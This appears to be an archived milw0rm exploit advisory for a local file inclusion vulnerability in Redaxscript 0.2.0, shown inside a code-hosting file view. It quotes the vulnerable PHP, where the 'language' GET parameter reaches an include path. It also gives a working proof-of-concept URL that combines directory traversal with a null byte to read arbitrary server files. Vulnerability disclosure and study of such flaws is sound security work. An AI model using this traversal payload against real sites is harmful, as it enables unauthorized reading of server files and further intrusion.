29 lines
970 B
Text
Executable file
29 lines
970 B
Text
Executable file
##################################################################################
|
|
[+] Redaxscript 0.2.0 (index.php language) Local File Inclusion Vulnerability
|
|
[+] Discovered By SirGod
|
|
[+] www.mortal-team.org
|
|
[+] www.h4cky0u.org
|
|
##################################################################################
|
|
|
|
[+] Local File Inclusion
|
|
|
|
index.php :
|
|
|
|
-----------------------------------------------------------------
|
|
include('template/'.$_SESSION[_root.'template'].'/index.php');
|
|
-----------------------------------------------------------------
|
|
|
|
function.php :
|
|
|
|
-----------------------------------------------------------------
|
|
if($_GET['language']) {
|
|
$_SESSION[_root.'language'] = $_GET['language'];
|
|
-----------------------------------------------------------------
|
|
|
|
- PoC :
|
|
|
|
http://127.0.0.1/index.php?language=../../../../../BOOTSECT.BAK%00
|
|
|
|
##################################################################################
|
|
|
|
# milw0rm.com [2009-04-10]
|